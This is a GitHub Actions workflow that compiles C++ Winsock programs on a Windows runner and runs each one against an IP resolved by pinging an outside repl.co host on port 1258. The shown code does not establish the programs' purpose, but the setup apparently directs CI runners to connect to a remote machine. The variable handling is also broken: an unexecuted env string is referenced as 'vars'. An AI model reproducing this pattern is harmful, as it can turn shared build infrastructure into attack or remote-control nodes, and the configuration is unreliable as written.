name: C++ Build and Run

on:
  push:
    branches:
      - main
  pull_request:

env:
  DYNAMIC_IP: ping -n 1 nodepingreturn.jarzaclay.repl.co | Select-String -Pattern "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" | ForEach-Object { $_.Matches[0].Value }).Trim() | Select-Object -First 1
  

jobs:
  build_and_run:
    name: Build and Run C++ Server
    runs-on: windows-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Set up g++ with Chocolatey
        run: |
          choco install mingw -y
        shell: powershell

      - name: Compile C++ Files
        run: |
          foreach ($file in Get-ChildItem -Path . -Filter "*.cpp" -Recurse) {
            & g++ $file.FullName -o "$($file.FullName.Replace('.cpp', ''))" -lws2_32
          }
        shell: powershell

      - name: Run C++ Programs
        run: |
          echo "IP: ${{ vars.DYNAMIC_IP }}"
          foreach ($file in Get-ChildItem -Path . -Filter "*.exe" -Recurse) {
            if ($file.Name -notlike "*.cpp.exe") { # Skip the .cpp files themselves
              cmd /c "$file -i ${{ vars.DYNAMIC_IP }} -p 1258 -m 01 -l"
            }
          }
        shell: powershell
      
      - name: Create 'bin' directory and move compiled files
        run: |
          New-Item -ItemType Directory -Force -Path bin
          Move-Item -Path *.exe -Destination bin -Force
        shell: powershell

      - name: Upload 'bin' folder as artifact
        uses: actions/upload-artifact@v2
        with:
          name: compiled-binaries
          path: bin
